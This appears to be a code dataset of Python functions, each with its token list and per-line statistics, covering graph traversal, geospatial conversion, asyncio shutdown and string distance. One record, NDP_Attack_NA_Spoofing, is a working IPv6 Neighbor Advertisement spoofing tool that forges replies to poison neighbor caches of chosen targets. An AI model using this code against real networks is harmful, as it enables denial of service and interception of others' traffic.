>>> step(g, 7, 5, 3, backward=True)
3
>>> def f(g, n1, n2, backward):
if n2 == 5:
return 7
return None
>>> step(g, 3, 5, continue_fn=f)
7
Parameters
----------
g : networkx DiGraph
n1 : node id in g
n2 : node id in g
(n1, n2) must be an edge in g
inbound : bool (default False)
whether incoming edges should be considered
backward : bool (default False)
whether edges are in reverse order (i.e., point from n2 to n1)
continue_fn : callable (optional)
if at an intersection, continue_fn is called to indicate how to
proceed
continue_fn takes the form:
f(g, n1, n2, backward) where all arguments are as passed into step.
f should return a node id such that f(g, n1, n2, backward) is a
successors of n2. f should return None if no way forward.
Returns
-------
The next node in the path from n1 to n2. Returns None if there
are no edges from n2 or multiple edges from n2
"""
forw = g.successors
back = g.predecessors
if backward:
back, forw = forw, back
nodes = forw(n2)
if inbound:
nodes = set(nodes + back(n2))
candidates = [n for n in nodes if n != n1]
if len(candidates) == 1:
result = candidates[0]
elif continue_fn:
result = continue_fn(g, n1, n2, backward)
else:
result = None
return result | [
"def",
"step",
"(",
"g",
",",
"n1",
",",
"n2",
",",
"inbound",
"=",
"False",
",",
"backward",
"=",
"False",
",",
"continue_fn",
"=",
"None",
")",
":",
"forw",
"=",
"g",
".",
"successors",
"back",
"=",
"g",
".",
"predecessors",
"if",
"backward",
":",
"back",
",",
"forw",
"=",
"forw",
",",
"back",
"nodes",
"=",
"forw",
"(",
"n2",
")",
"if",
"inbound",
":",
"nodes",
"=",
"set",
"(",
"nodes",
"+",
"back",
"(",
"n2",
")",
")",
"candidates",
"=",
"[",
"n",
"for",
"n",
"in",
"nodes",
"if",
"n",
"!=",
"n1",
"]",
"if",
"len",
"(",
"candidates",
")",
"==",
"1",
":",
"result",
"=",
"candidates",
"[",
"0",
"]",
"elif",
"continue_fn",
":",
"result",
"=",
"continue_fn",
"(",
"g",
",",
"n1",
",",
"n2",
",",
"backward",
")",
"else",
":",
"result",
"=",
"None",
"return",
"result"
] | 25.051948 | [
0.014492753623188406,
0.2857142857142857,
0.02564102564102564,
0,
0.1111111111111111,
0.041666666666666664,
0.08,
0,
0.1935483870967742,
0.17391304347826086,
0.13043478260869565,
0.17391304347826086,
0.13043478260869565,
0,
0.14285714285714285,
0.4,
0.14285714285714285,
0.25,
0,
0.14285714285714285,
0.4,
0.08571428571428572,
0.25,
0,
0.07692307692307693,
0.4,
0,
0.08571428571428572,
0.08695652173913043,
0.08333333333333333,
0.08695652173913043,
0.08333333333333333,
0.4,
0,
0,
0.14285714285714285,
0.14285714285714285,
0.125,
0.14285714285714285,
0.14285714285714285,
0.05405405405405406,
0.11764705882352941,
0.0392156862745098,
0.11428571428571428,
0.04285714285714286,
0.10810810810810811,
0.028169014084507043,
0.13333333333333333,
0,
0.05714285714285714,
0.02666666666666667,
0.028169014084507043,
0.03076923076923077,
0,
0.18181818181818182,
0.18181818181818182,
0.030303030303030304,
0.04,
0,
0.2857142857142857,
0.08695652173913043,
0.08,
0.125,
0.06451612903225806,
0,
0.1,
0.13333333333333333,
0.05405405405405406,
0.043478260869565216,
0,
0.07142857142857142,
0.06666666666666667,
0.09523809523809523,
0.04081632653061224,
0.2222222222222222,
0.09523809523809523,
0.11764705882352941
] |
def rectangle_geo_array(rectangle, map_canvas):
"""Obtain the rectangle in EPSG:4326.
:param rectangle: A rectangle instance.
:type rectangle: QgsRectangle
:param map_canvas: A map canvas instance.
:type map_canvas: QgsMapCanvas
:returns: A list in the form [xmin, ymin, xmax, ymax] where all
coordinates provided are in Geographic / EPSG:4326.
:rtype: list
.. note:: Delegates to extent_to_array()
"""
destination_crs = QgsCoordinateReferenceSystem()
destination_crs.createFromSrid(4326)
source_crs = map_canvas.mapSettings().destinationCrs()
return extent_to_array(rectangle, source_crs, destination_crs) | [
"def",
"rectangle_geo_array",
"(",
"rectangle",
",",
"map_canvas",
")",
":",
"destination_crs",
"=",
"QgsCoordinateReferenceSystem",
"(",
")",
"destination_crs",
".",
"createFromSrid",
"(",
"4326",
")",
"source_crs",
"=",
"map_canvas",
".",
"mapSettings",
"(",
")",
".",
"destinationCrs",
"(",
")",
"return",
"extent_to_array",
"(",
"rectangle",
",",
"source_crs",
",",
"destination_crs",
")"
] | 29.636364 | [
0.02127659574468085,
0.04878048780487805,
0,
0.06976744186046512,
0.09090909090909091,
0,
0.06666666666666667,
0.08823529411764706,
0,
0.05970149253731343,
0.05084745762711865,
0.1875,
0,
0.06818181818181818,
0.2857142857142857,
0,
0.038461538461538464,
0.05,
0,
0.034482758620689655,
0,
0.030303030303030304
] |
def shutdown_waits_for(coro, loop=None):
"""Prevent coro from being cancelled during the shutdown sequence.
The trick here is that we add this coro to the global
"DO_NOT_CANCEL" collection, and then later during the shutdown
sequence we make sure that the task that wraps this coro will NOT
be cancelled.
To make this work, we have to create a super-secret task, below, that
communicates with the caller (which "awaits" us) via a Future. Using
a Future in this way allows us to avoid awaiting the Task, which
decouples the Task from the normal exception propagation which would
normally happen when the outer Task gets cancelled. We get the
result of coro back to the caller via Future.set_result.
NOTE that during the shutdown sequence, the caller WILL NOT be able
to receive a result, since the caller will likely have been
cancelled. So you should probably not rely on capturing results
via this function.
"""
loop = loop or get_event_loop()
fut = loop.create_future() # This future will connect coro and the caller.
async def coro_proxy():
"""This function will await coro, but it will also send the result
over the the future. Remember: the outside caller (of
shutdown_waits_for) will be awaiting fut, NOT coro(), due to
the decoupling. However, when coro completes, we need to send its
result over to the fut to make it look *as if* it was just coro
running the whole time. This whole thing is a teeny magic trick.
"""
try:
result = await coro
except (CancelledError, Exception) as e:
set_fut_done = partial(fut.set_exception, e)
else:
set_fut_done = partial(fut.set_result, result)
if not fut.cancelled():
set_fut_done()
new_coro = coro_proxy() # We'll taskify this one instead of coro.
_DO_NOT_CANCEL_COROS.add(new_coro) # The new task must not be cancelled.
loop.create_task(new_coro) # Make the task
# Ok, so we *could* simply return fut. Callers can await it as normal,
# e.g.
#
# async def blah():
# x = await shutdown_waits_for(bleh())
#
# That will work fine. However, callers may *also* want to detach the
# call from the current execution context, e.g.
#
# async def blah():
# loop.create_task(shutdown_waits_for(bleh()))
#
# This will only work if shutdown_waits_for() returns a coroutine.
# Therefore, we just make a new coroutine to wrap the `await fut` and
# return that. Then both things will work.
#
# (Side note: instead of callers using create_tasks, it would also work
# if they used `asyncio.ensure_future()` instead, since that can work
# with futures. But I don't like ensure_future.)
#
# (Another side note: You don't even need `create_task()` or
# `ensure_future()`...If you don't want a result, you can just call
# `shutdown_waits_for()` as a flat function call, no await or anything,
# and it should still work; unfortunately it causes a RuntimeWarning to
# tell you that ``inner()`` was never awaited :/
async def inner():
return await fut
return inner() | [
"def",
"shutdown_waits_for",
"(",
"coro",
",",
"loop",
"=",
"None",
")",
":",
"loop",
"=",
"loop",
"or",
"get_event_loop",
"(",
")",
"fut",
"=",
"loop",
".",
"create_future",
"(",
")",
"# This future will connect coro and the caller.",
"async",
"def",
"coro_proxy",
"(",
")",
":",
"\"\"\"This function will await coro, but it will also send the result\n over the the future. Remember: the outside caller (of\n shutdown_waits_for) will be awaiting fut, NOT coro(), due to\n the decoupling. However, when coro completes, we need to send its\n result over to the fut to make it look *as if* it was just coro\n running the whole time. This whole thing is a teeny magic trick.\n \"\"\"",
"try",
":",
"result",
"=",
"await",
"coro",
"except",
"(",
"CancelledError",
",",
"Exception",
")",
"as",
"e",
":",
"set_fut_done",
"=",
"partial",
"(",
"fut",
".",
"set_exception",
",",
"e",
")",
"else",
":",
"set_fut_done",
"=",
"partial",
"(",
"fut",
".",
"set_result",
",",
"result",
")",
"if",
"not",
"fut",
".",
"cancelled",
"(",
")",
":",
"set_fut_done",
"(",
")",
"new_coro",
"=",
"coro_proxy",
"(",
")",
"# We'll taskify this one instead of coro.",
"_DO_NOT_CANCEL_COROS",
".",
"add",
"(",
"new_coro",
")",
"# The new task must not be cancelled.",
"loop",
".",
"create_task",
"(",
"new_coro",
")",
"# Make the task",
"# Ok, so we *could* simply return fut. Callers can await it as normal,",
"# e.g.",
"#",
"# async def blah():",
"# x = await shutdown_waits_for(bleh())",
"#",
"# That will work fine. However, callers may *also* want to detach the",
"# call from the current execution context, e.g.",
"#",
"# async def blah():",
"# loop.create_task(shutdown_waits_for(bleh()))",
"#",
"# This will only work if shutdown_waits_for() returns a coroutine.",
"# Therefore, we just make a new coroutine to wrap the `await fut` and",
"# return that. Then both things will work.",
"#",
"# (Side note: instead of callers using create_tasks, it would also work",
"# if they used `asyncio.ensure_future()` instead, since that can work",
"# with futures. But I don't like ensure_future.)",
"#",
"# (Another side note: You don't even need `create_task()` or",
"# `ensure_future()`...If you don't want a result, you can just call",
"# `shutdown_waits_for()` as a flat function call, no await or anything,",
"# and it should still work; unfortunately it causes a RuntimeWarning to",
"# tell you that ``inner()`` was never awaited :/",
"async",
"def",
"inner",
"(",
")",
":",
"return",
"await",
"fut",
"return",
"inner",
"(",
")"
] | 42.333333 | [
0.025,
0.02857142857142857,
0,
0.03508771929824561,
0.030303030303030304,
0.028985507246376812,
0.11764705882352941,
0,
0.0273972602739726,
0.041666666666666664,
0.029411764705882353,
0.027777777777777776,
0.029850746268656716,
0.03333333333333333,
0,
0.028169014084507043,
0.031746031746031744,
0.029411764705882353,
0.09090909090909091,
0.2857142857142857,
0.05714285714285714,
0.02531645569620253,
0,
0.07407407407407407,
0.02702702702702703,
0.06557377049180328,
0.04411764705882353,
0.0273972602739726,
0.04225352112676056,
0.027777777777777776,
0.18181818181818182,
0.16666666666666666,
0.06451612903225806,
0.041666666666666664,
0.03571428571428571,
0.15384615384615385,
0.034482758620689655,
0,
0.06451612903225806,
0.07692307692307693,
0,
0.02857142857142857,
0.025974025974025976,
0.0425531914893617,
0,
0.02666666666666667,
0.2,
0.4,
0.08695652173913043,
0.045454545454545456,
0.4,
0.02702702702702703,
0.0392156862745098,
0.4,
0.08695652173913043,
0.038461538461538464,
0.4,
0.02857142857142857,
0.0273972602739726,
0.0425531914893617,
0.4,
0.02666666666666667,
0.0273972602739726,
0.038461538461538464,
0.4,
0.03125,
0.028169014084507043,
0.02666666666666667,
0.02666666666666667,
0.038461538461538464,
0,
0.09090909090909091,
0.08333333333333333,
0,
0.1111111111111111
] |
def zones(self):
"""
:class:`list` of :class:`stravalib.model.ActivityZone` objects for this activity.
"""
if self._zones is None:
self.assert_bind_client()
self._zones = self.bind_client.get_activity_zones(self.id)
return self._zones | [
"def",
"zones",
"(",
"self",
")",
":",
"if",
"self",
".",
"_zones",
"is",
"None",
":",
"self",
".",
"assert_bind_client",
"(",
")",
"self",
".",
"_zones",
"=",
"self",
".",
"bind_client",
".",
"get_activity_zones",
"(",
"self",
".",
"id",
")",
"return",
"self",
".",
"_zones"
] | 36.375 | [
0.0625,
0.18181818181818182,
0.10112359550561797,
0.18181818181818182,
0.06451612903225806,
0.05405405405405406,
0.02857142857142857,
0.07692307692307693
] |
async def tuple(self, elem=None, elem_type=None, params=None):
"""
Loads/dumps tuple
:return:
"""
version = await self.version(elem_type, params, elem=elem)
if self.is_tracked():
return self.get_tracked()
if hasattr(elem_type, 'boost_serialize'):
container = elem_type() if elem is None else elem
self.pop_track()
return await container.boost_serialize(self, elem=elem, elem_type=elem_type, params=params, version=version)
if self.writing:
self.pop_track()
return await self.dump_tuple(elem, elem_type, params)
else:
obj = await self.load_tuple(elem_type, params=params, elem=elem)
return self.track_obj(obj) | [
"async",
"def",
"tuple",
"(",
"self",
",",
"elem",
"=",
"None",
",",
"elem_type",
"=",
"None",
",",
"params",
"=",
"None",
")",
":",
"version",
"=",
"await",
"self",
".",
"version",
"(",
"elem_type",
",",
"params",
",",
"elem",
"=",
"elem",
")",
"if",
"self",
".",
"is_tracked",
"(",
")",
":",
"return",
"self",
".",
"get_tracked",
"(",
")",
"if",
"hasattr",
"(",
"elem_type",
",",
"'boost_serialize'",
")",
":",
"container",
"=",
"elem_type",
"(",
")",
"if",
"elem",
"is",
"None",
"else",
"elem",
"self",
".",
"pop_track",
"(",
")",
"return",
"await",
"container",
".",
"boost_serialize",
"(",
"self",
",",
"elem",
"=",
"elem",
",",
"elem_type",
"=",
"elem_type",
",",
"params",
"=",
"params",
",",
"version",
"=",
"version",
")",
"if",
"self",
".",
"writing",
":",
"self",
".",
"pop_track",
"(",
")",
"return",
"await",
"self",
".",
"dump_tuple",
"(",
"elem",
",",
"elem_type",
",",
"params",
")",
"else",
":",
"obj",
"=",
"await",
"self",
".",
"load_tuple",
"(",
"elem_type",
",",
"params",
"=",
"params",
",",
"elem",
"=",
"elem",
")",
"return",
"self",
".",
"track_obj",
"(",
"obj",
")"
] | 37.95 | [
0.016129032258064516,
0.18181818181818182,
0.08,
0.1875,
0.18181818181818182,
0.030303030303030304,
0.06896551724137931,
0.05405405405405406,
0,
0.04081632653061224,
0.03278688524590164,
0.07142857142857142,
0.025,
0,
0.08333333333333333,
0.07142857142857142,
0.03076923076923077,
0.15384615384615385,
0.02631578947368421,
0.05263157894736842
] |
def qasm(self, prec=15):
"""Return the corresponding OPENQASM string."""
if self.value == pi:
return "pi"
return ccode(self.value, precision=prec) | [
"def",
"qasm",
"(",
"self",
",",
"prec",
"=",
"15",
")",
":",
"if",
"self",
".",
"value",
"==",
"pi",
":",
"return",
"\"pi\"",
"return",
"ccode",
"(",
"self",
".",
"value",
",",
"precision",
"=",
"prec",
")"
] | 29.666667 | [
0.041666666666666664,
0.03636363636363636,
0.07142857142857142,
0.08695652173913043,
0,
0.041666666666666664
] |
def aligned_covariance(fit, type='noise'):
"""
Covariance rescaled so that eigenvectors sum to 1
and rotated into data coordinates from PCA space
"""
cov = fit._covariance_matrix(type)
# Rescale eigenvectors to sum to 1
cov /= N.linalg.norm(cov)
return dot(fit.axes,cov) | [
"def",
"aligned_covariance",
"(",
"fit",
",",
"type",
"=",
"'noise'",
")",
":",
"cov",
"=",
"fit",
".",
"_covariance_matrix",
"(",
"type",
")",
"# Rescale eigenvectors to sum to 1",
"cov",
"/=",
"N",
".",
"linalg",
".",
"norm",
"(",
"cov",
")",
"return",
"dot",
"(",
"fit",
".",
"axes",
",",
"cov",
")"
] | 32.666667 | [
0.023809523809523808,
0.2857142857142857,
0.03773584905660377,
0.038461538461538464,
0.2857142857142857,
0.05263157894736842,
0.05263157894736842,
0.06896551724137931,
0.10714285714285714
] |
def delete_dataset(self, dataset, delete_nonempty=True):
"""Deletes a dataset (and optionally any tables in it), if it exists.
:param dataset:
:type dataset: BQDataset
:param delete_nonempty: if true, will delete any tables before deleting the dataset
"""
if not self.dataset_exists(dataset):
return
self.client.datasets().delete(projectId=dataset.project_id,
datasetId=dataset.dataset_id,
deleteContents=delete_nonempty).execute() | [
"def",
"delete_dataset",
"(",
"self",
",",
"dataset",
",",
"delete_nonempty",
"=",
"True",
")",
":",
"if",
"not",
"self",
".",
"dataset_exists",
"(",
"dataset",
")",
":",
"return",
"self",
".",
"client",
".",
"datasets",
"(",
")",
".",
"delete",
"(",
"projectId",
"=",
"dataset",
".",
"project_id",
",",
"datasetId",
"=",
"dataset",
".",
"dataset_id",
",",
"deleteContents",
"=",
"delete_nonempty",
")",
".",
"execute",
"(",
")"
] | 41 | [
0.017857142857142856,
0.025974025974025976,
0,
0.15384615384615385,
0.11428571428571428,
0.05319148936170213,
0.18181818181818182,
0,
0.045454545454545456,
0.1111111111111111,
0,
0.04477611940298507,
0.05970149253731343,
0.06329113924050633
] |
def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
reply_mac=None, router=False):
"""
The main purpose of this function is to send fake Neighbor Advertisement
messages to a victim. As the emission of unsolicited Neighbor Advertisement
is pretty pointless (from an attacker standpoint) because it will not
lead to a modification of a victim's neighbor cache, the function send
advertisements in response to received NS (NS sent as part of the DAD,
i.e. with an unspecified address as source, are not considered).
By default, the fake NA sent to create the DoS uses:
- as target address the target address found in received NS.
- as IPv6 source address: the target address
- as IPv6 destination address: the source IPv6 address of received NS
message.
- the mac address of the interface as source (or reply_mac, see below).
- the source mac address of the received NS as destination macs address
of the emitted NA.
- A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
filled with the mac address used as source of the NA.
Following arguments can be used to change the behavior:
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If None is provided conf.iface is used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only NS messages received from this source will trigger replies.
This allows limiting the effects of the DoS to a single target by
filtering on its mac address. The default value is None: the DoS
is not limited to a specific mac address.
tgt_filter: Same as previous but for a specific target IPv6 address for
received NS. If the target address in the NS message (not the IPv6
destination address) matches that address, then a fake reply will
be sent, i.e. the emitter will be a target of the DoS.
reply_mac: allow specifying a specific source mac address for the reply,
i.e. to prevent the use of the mac address of the interface. This
address will also be used in the Target Link-Layer Address option.
router: by the default (False) the 'R' flag in the NA used for the reply
is not set. If the parameter is set to True, the 'R' flag in the
NA is set, advertising us as a router.
Please, keep the following in mind when using the function: for obvious
reasons (kernel space vs. Python speed), when the target of the address
resolution is on the link, the sender of the NS receives 2 NA messages
in a row, the valid one and our fake one. The second one will overwrite
the information provided by the first one, i.e. the natural latency of
Scapy helps here.
In practice, on a common Ethernet link, the emission of the NA from the
genuine target (kernel stack) usually occurs in the same millisecond as
the receipt of the NS. The NA generated by Scapy6 will usually come after
something 20+ ms. On a usual testbed for instance, this difference is
sufficient to have the first data packet sent from the victim to the
destination before it even receives our fake NA.
"""
def is_request(req, mac_src_filter, tgt_filter):
"""
Check if packet req is a request
"""
# Those simple checks are based on Section 5.4.2 of RFC 4862
if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
# Source must NOT be the unspecified address
if req[IPv6].src == "::":
return 0
tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
if tgt_filter and tgt != tgt_filter:
return 0
dst = req[IPv6].dst
if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast.
# If this is a real address resolution NS, then the destination
# address of the packet is the link-local solicited node multicast
# address associated with the target of the NS.
# Otherwise, the NS is a NUD related one, i.e. the peer is
# unicasting the NS to check the target is still alive (L2
# information is still in its cache and it is verified)
received_snma = inet_pton(socket.AF_INET6, dst)
expected_snma = in6_getnsma(tgt)
if received_snma != expected_snma:
print("solicited node multicast @ does not match target @!")
return 0
return 1
def reply_callback(req, reply_mac, router, iface):
"""
Callback that reply to a NS with a spoofed NA
"""
# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
# send it back.
mac = req[Ether].src
pkt = req[IPv6]
src = pkt.src
tgt = req[ICMPv6ND_NS].tgt
rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
# Use the target field from the NS
rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741
# "If the solicitation IP Destination Address is not a multicast
# address, the Target Link-Layer Address option MAY be omitted"
# Given our purpose, we always include it.
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
sendp(rep, iface=iface, verbose=0)
print("Reply NA for target address %s (received from %s)" % (tgt, mac))
if not iface:
iface = conf.iface
# To prevent sniffing our own traffic
if not reply_mac:
reply_mac = get_if_hwaddr(iface)
sniff_filter = "icmp6 and not ether src %s" % reply_mac
router = (router and 1) or 0 # Value of the R flags in NA
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
prn=lambda x: reply_callback(x, reply_mac, router, iface),
iface=iface) | [
"def",
"NDP_Attack_NA_Spoofing",
"(",
"iface",
"=",
"None",
",",
"mac_src_filter",
"=",
"None",
",",
"tgt_filter",
"=",
"None",
",",
"reply_mac",
"=",
"None",
",",
"router",
"=",
"False",
")",
":",
"def",
"is_request",
"(",
"req",
",",
"mac_src_filter",
",",
"tgt_filter",
")",
":",
"\"\"\"\n Check if packet req is a request\n \"\"\"",
"# Those simple checks are based on Section 5.4.2 of RFC 4862",
"if",
"not",
"(",
"Ether",
"in",
"req",
"and",
"IPv6",
"in",
"req",
"and",
"ICMPv6ND_NS",
"in",
"req",
")",
":",
"return",
"0",
"mac_src",
"=",
"req",
"[",
"Ether",
"]",
".",
"src",
"if",
"mac_src_filter",
"and",
"mac_src",
"!=",
"mac_src_filter",
":",
"return",
"0",
"# Source must NOT be the unspecified address",
"if",
"req",
"[",
"IPv6",
"]",
".",
"src",
"==",
"\"::\"",
":",
"return",
"0",
"tgt",
"=",
"inet_pton",
"(",
"socket",
".",
"AF_INET6",
",",
"req",
"[",
"ICMPv6ND_NS",
"]",
".",
"tgt",
")",
"if",
"tgt_filter",
"and",
"tgt",
"!=",
"tgt_filter",
":",
"return",
"0",
"dst",
"=",
"req",
"[",
"IPv6",
"]",
".",
"dst",
"if",
"in6_isllsnmaddr",
"(",
"dst",
")",
":",
"# Address is Link Layer Solicited Node mcast.",
"# If this is a real address resolution NS, then the destination",
"# address of the packet is the link-local solicited node multicast",
"# address associated with the target of the NS.",
"# Otherwise, the NS is a NUD related one, i.e. the peer is",
"# unicasting the NS to check the target is still alive (L2",
"# information is still in its cache and it is verified)",
"received_snma",
"=",
"inet_pton",
"(",
"socket",
".",
"AF_INET6",
",",
"dst",
")",
"expected_snma",
"=",
"in6_getnsma",
"(",
"tgt",
")",
"if",
"received_snma",
"!=",
"expected_snma",
":",
"print",
"(",
"\"solicited node multicast @ does not match target @!\"",
")",
"return",
"0",
"return",
"1",
"def",
"reply_callback",
"(",
"req",
",",
"reply_mac",
",",
"router",
",",
"iface",
")",
":",
"\"\"\"\n Callback that reply to a NS with a spoofed NA\n \"\"\"",
"# Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and",
"# send it back.",
"mac",
"=",
"req",
"[",
"Ether",
"]",
".",
"src",
"pkt",
"=",
"req",
"[",
"IPv6",
"]",
"src",
"=",
"pkt",
".",
"src",
"tgt",
"=",
"req",
"[",
"ICMPv6ND_NS",
"]",
".",
"tgt",
"rep",
"=",
"Ether",
"(",
"src",
"=",
"reply_mac",
",",
"dst",
"=",
"mac",
")",
"/",
"IPv6",
"(",
"src",
"=",
"tgt",
",",
"dst",
"=",
"src",
")",
"# Use the target field from the NS",
"rep",
"/=",
"ICMPv6ND_NA",
"(",
"tgt",
"=",
"tgt",
",",
"S",
"=",
"1",
",",
"R",
"=",
"router",
",",
"O",
"=",
"1",
")",
"# noqa: E741",
"# \"If the solicitation IP Destination Address is not a multicast",
"# address, the Target Link-Layer Address option MAY be omitted\"",
"# Given our purpose, we always include it.",
"rep",
"/=",
"ICMPv6NDOptDstLLAddr",
"(",
"lladdr",
"=",
"reply_mac",
")",
"sendp",
"(",
"rep",
",",
"iface",
"=",
"iface",
",",
"verbose",
"=",
"0",
")",
"print",
"(",
"\"Reply NA for target address %s (received from %s)\"",
"%",
"(",
"tgt",
",",
"mac",
")",
")",
"if",
"not",
"iface",
":",
"iface",
"=",
"conf",
".",
"iface",
"# To prevent sniffing our own traffic",
"if",
"not",
"reply_mac",
":",
"reply_mac",
"=",
"get_if_hwaddr",
"(",
"iface",
")",
"sniff_filter",
"=",
"\"icmp6 and not ether src %s\"",
"%",
"reply_mac",
"router",
"=",
"(",
"router",
"and",
"1",
")",
"or",
"0",
"# Value of the R flags in NA",
"sniff",
"(",
"store",
"=",
"0",
",",
"filter",
"=",
"sniff_filter",
",",
"lfilter",
"=",
"lambda",
"x",
":",
"is_request",
"(",
"x",
",",
"mac_src_filter",
",",
"tgt_filter",
")",
",",
"prn",
"=",
"lambda",
"x",
":",
"reply_callback",
"(",
"x",
",",
"reply_mac",
",",
"router",
",",
"iface",
")",
",",
"iface",
"=",
"iface",
")"
] | 43.955882 | [
0.02631578947368421,
0.10526315789473684,
0.2857142857142857,
0.02631578947368421,
0.02531645569620253,
0.0410958904109589,
0.02702702702702703,
0.05405405405405406,
0.04411764705882353,
0,
0.03571428571428571,
0.046153846153846156,
0.061224489795918366,
0.04054054054054054,
0.2,
0.06578947368421052,
0.039473684210526314,
0.12,
0.0625,
0.05,
0,
0.03389830508474576,
0,
0.041666666666666664,
0.0410958904109589,
0,
0.0410958904109589,
0.0410958904109589,
0.04054054054054054,
0.0410958904109589,
0.06,
0,
0.02666666666666667,
0.06666666666666667,
0.05405405405405406,
0.047619047619047616,
0,
0.02631578947368421,
0.04054054054054054,
0.04,
0,
0.039473684210526314,
0.0410958904109589,
0.06382978723404255,
0,
0.02666666666666667,
0.04,
0.02702702702702703,
0.02666666666666667,
0.02702702702702703,
0.09523809523809523,
0,
0.02666666666666667,
0.04,
0.025974025974025976,
0.0410958904109589,
0.027777777777777776,
0.038461538461538464,
0.2857142857142857,
0,
0.038461538461538464,
0.18181818181818182,
0.05,
0.18181818181818182,
0,
0.029411764705882353,
0.028985507246376812,
0.1,
0,
0.0625,
0.03571428571428571,
0.1,
0,
0.038461538461538464,
0.06060606060606061,
0.1,
0,
0.03225806451612903,
0.045454545454545456,
0.1,
0,
0.07407407407407407,
0.02531645569620253,
0,
0.02666666666666667,
0.02564102564102564,
0.03389830508474576,
0.02857142857142857,
0.02857142857142857,
0.029850746268656716,
0.03389830508474576,
0.045454545454545456,
0.043478260869565216,
0.02631578947368421,
0.08333333333333333,
0,
0.125,
0,
0.037037037037037035,
0.18181818181818182,
0.03773584905660377,
0.18181818181818182,
0,
0.02631578947368421,
0.08695652173913043,
0.07142857142857142,
0.08695652173913043,
0.09523809523809523,
0.058823529411764705,
0.029411764705882353,
0.047619047619047616,
0.028985507246376812,
0,
0.027777777777777776,
0.028169014084507043,
0.04,
0.03773584905660377,
0,
0.047619047619047616,
0,
0.02531645569620253,
0,
0.11764705882352941,
0.07692307692307693,
0.04878048780487805,
0.09523809523809523,
0.05,
0.03389830508474576,
0,
0.03225806451612903,
0,
0.16666666666666666,
0.13333333333333333,
0.07142857142857142,
0.07352941176470588,
0.22727272727272727
] |
def distance_calc(s1, s2):
"""
Calculate Levenshtein distance between two words.
:param s1: first word
:type s1 : str
:param s2: second word
:type s2 : str
:return: distance between two word
References :
1- https://stackoverflow.com/questions/2460177/edit-distance-in-python
2- https://en.wikipedia.org/wiki/Levenshtein_distance
"""
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2 + 1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(
1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1] | [
"def",
"distance_calc",
"(",
"s1",
",",
"s2",
")",
":",
"if",
"len",
"(",
"s1",
")",
">",
"len",
"(",
"s2",
")",
":",
"s1",
",",
"s2",
"=",
"s2",
",",
"s1",
"distances",
"=",
"range",
"(",
"len",
"(",
"s1",
")",
"+",
"1",
")",
"for",
"i2",
",",
"c2",
"in",
"enumerate",
"(",
"s2",
")",
":",
"distances_",
"=",
"[",
"i2",
"+",
"1",
"]",
"for",
"i1",
",",
"c1",
"in",
"enumerate",
"(",
"s1",
")",
":",
"if",
"c1",
"==",
"c2",
":",
"distances_",
".",
"append",
"(",
"distances",
"[",
"i1",
"]",
")",
"else",
":",
"distances_",
".",
"append",
"(",
"1",
"+",
"min",
"(",
"(",
"distances",
"[",
"i1",
"]",
",",
"distances",
"[",
"i1",
"+",
"1",
"]",
",",
"distances_",
"[",
"-",
"1",
"]",
")",
")",
")",
"distances",
"=",
"distances_",
"return",
"distances",
"[",
"-",
"1",
"]"
] | 28.607143 | [
0.038461538461538464,
0.2857142857142857,
0.03773584905660377,
0,
0.12,
0.2222222222222222,
0.11538461538461539,
0.2222222222222222,
0.07894736842105263,
0,
0.1875,
0.05405405405405406,
0.07017543859649122,
0.2857142857142857,
0.08,
0.08695652173913043,
0,
0.058823529411764705,
0.0625,
0.06896551724137931,
0.05555555555555555,
0.08333333333333333,
0.041666666666666664,
0.11764705882352941,
0.08823529411764706,
0.05,
0.06666666666666667,
0.08333333333333333
] |
def items(self):
"""Return all of the rows that are in the result set.
:rtype: list
"""
if not self.cursor.rowcount:
return []
self.cursor.scroll(0, 'absolute')
return self.cursor.fetchall() | [
"def",
"items",
"(",
"self",
")",
":",
"if",
"not",
"self",
".",
"cursor",
".",
"rowcount",
":",
"return",
"[",
"]",
"self",
".",
"cursor",
".",
"scroll",
"(",
"0",
",",
"'absolute'",
")",
"return",
"self",
".",
"cursor",
".",
"fetchall",
"(",
")"
] | 22.090909 | [
0.0625,
0.03278688524590164,
0,
0.15,
0,
0.18181818181818182,
0.05555555555555555,
0.09523809523809523,
0,
0.04878048780487805,
0.05405405405405406
] |
def eval(self, operator, simulator=None):
"""Load all operands and process them by self._evalFn"""
def getVal(v):
while not isinstance(v, Value):
v = v._val
return v
operands = list(map(getVal, operator.operands))
if isEventDependentOp(operator.operator):
operands.append(simulator.now)
elif operator.operator == AllOps.IntToBits:
operands.append(operator.result._dtype)
return self._evalFn(*operands) | [
"def",
"eval",
"(",
"self",
",",
"operator",
",",
"simulator",
"=",
"None",
")",
":",
"def",
"getVal",
"(",
"v",
")",
":",
"while",
"not",
"isinstance",
"(",
"v",
",",
"Value",
")",
":",
"v",
"=",
"v",
".",
"_val",
"return",
"v",
"operands",
"=",
"list",
"(",
"map",
"(",
"getVal",
",",
"operator",
".",
"operands",
")",
")",
"if",
"isEventDependentOp",
"(",
"operator",
".",
"operator",
")",
":",
"operands",
".",
"append",
"(",
"simulator",
".",
"now",
")",
"elif",
"operator",
".",
"operator",
"==",
"AllOps",
".",
"IntToBits",
":",
"operands",
".",
"append",
"(",
"operator",
".",
"result",
".",
"_dtype",
")",
"return",
"self",
".",
"_evalFn",
"(",
"*",
"operands",
")"
] | 31.375 | [
0.024390243902439025,
0.03125,
0.09090909090909091,
0.046511627906976744,
0.07692307692307693,
0,
0.1,
0,
